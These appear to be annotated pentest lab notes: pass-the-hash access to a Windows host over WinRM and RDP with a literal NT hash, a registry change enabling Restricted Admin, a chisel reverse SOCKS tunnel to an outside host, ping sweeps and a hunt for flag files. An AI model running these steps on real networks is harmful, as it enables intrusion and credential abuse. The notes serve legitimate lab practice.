# Session notes: WinRM and RDP access to 172.16.4.5 through a proxychains tunnel,
# authenticating with an NT hash (-H / /pth:) instead of a password.
# The hash is a reusable credential in its own right; redact it before these notes are shared.
# NOTE(review): "/domain:..." is not evil-winrm option syntax (it resembles xfreerdp's /d:);
# it is probably ignored here. Confirm.
proxychains -f proxychains4.conf evil-winrm -i 172.16.4.5 -u 'Administrator' -H a569f80ccd9fda0ea5e749d20aa80657 /domain:client.offshore.com
# Sets DisableRestrictedAdmin to 0, which turns on Restricted Admin mode for RDP; the /pth: logon below depends on it.
# This weakens the host's configuration: record the change and restore the previous value when the engagement ends.
# For the report: a write to this value under HKLM\System\CurrentControlSet\Control\Lsa is a useful detection point.
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
# RDP logon with the same hash, relying on the Restricted Admin setting made by the reg add above.
proxychains -f proxychains4.conf xfreerdp /u:Administrator /pth:a569f80ccd9fda0ea5e749d20aa80657 /v:172.16.4.5
# chisel client: connects out to 10.10.15.149:8004 and requests a reverse SOCKS listener on server-side port 7000.
# Presumably proxychains4.conf points at that listener; confirm against the config file.
.\chiselj.exe client 10.10.15.149:8004 R:7000:socks
Ping Sweep
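# Ping sweep: sends one echo request to each address and prints "<address>: True/False".
# The first command is recovered from a mis-encoded (UTF-16) copy that was fused onto the same line;
# the second is the same sweep against a different /24.
# NOTE(review): 1..256 also covers .255 (the broadcast address on a /24) and .256 (not a valid octet);
# those rows should simply report False and can be ignored.
1..256 | % {"172.16.4.$($_): $(Test-Connection -count 1 -comp 172.16.4.$($_) -quiet)"}
1..256 | % {"192.168.210.$($_): $(Test-Connection -count 1 -comp 192.168.210.$($_) -quiet)"}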
New IP
172.16.4.120 — Linux ping 64
172.16.2.12 — Windows ping 126
172.16.1.22 — Linux ping 64
Machine names
NIX02 — Linux
DEV-MGMT01 — Windows
CLIENT-NIX03 — Linux
# Walks every filesystem drive from its root and lists files named user.txt.
# -ErrorAction SilentlyContinue hides access-denied and similar errors so the walk keeps going.
# NOTE(review): the listing recorded after this command shows flag.txt hits, so it was presumably
# produced with a different -Filter value than the one written here. Confirm.
foreach ($drive in Get-PSDrive -PSProvider FileSystem) {
    Get-ChildItem -Path $drive.Root -Filter user.txt -Recurse -ErrorAction SilentlyContinue
}
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/28/2018 6:22 PM 37 flag.txt
Directory: C:\Windows\SYSVOL\domain\Policies\{ABBDB649-E74D-4DDB-A6B3-9C1055BE903C}\Machine
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/28/2018 5:54 PM 27 flag.txt
Directory: C:\Windows\SYSVOL\sysvol\CLIENT.OFFSHORE.COM\Policies\{ABBDB649-E74D-4DDB-A6B3-9C1055BE903C}\Machine
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/28/2018 5:54 PM 27 flag.txt